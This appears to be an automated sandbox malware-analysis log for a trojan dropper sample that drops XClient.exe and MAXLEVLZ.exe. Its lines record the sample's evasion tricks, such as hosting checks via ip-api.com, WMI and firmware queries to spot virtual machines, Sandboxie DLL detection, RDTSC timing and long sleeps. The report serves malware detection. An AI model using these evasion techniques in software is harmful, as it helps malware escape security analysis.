Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: MAXLEVLZ.exe, 00000002.00000002.1531433838.0000006B036F7000.00000004.00000010.00020000.00000000.sdmp, XClient.exe, 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: MAXLEVLZ.exe, 00000002.00000002.1531433838.0000006B036F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLT-UTILITY-L1-1-0.DLLLLI%
Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: SBIEDLL.DLLINFO

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Special instruction interceptor: First address: 7FF627349950 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Special instruction interceptor: First address: 7FF62734995E instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Memory allocated: 34F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Memory allocated: 1D170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1ADC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1ABE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598840	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\XClient.exe	Window / User API: threadDelayed 619	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Window / User API: threadDelayed 9241	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7007	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2466	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7435
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2160
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8137
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8304
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1282

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe TID: 7896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe TID: 7484	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -598840s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3888	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796	Thread sleep count: 7435 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896	Thread sleep count: 2160 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 8137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 1479 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1864	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7988	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 6700	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Roaming\XClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598840	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
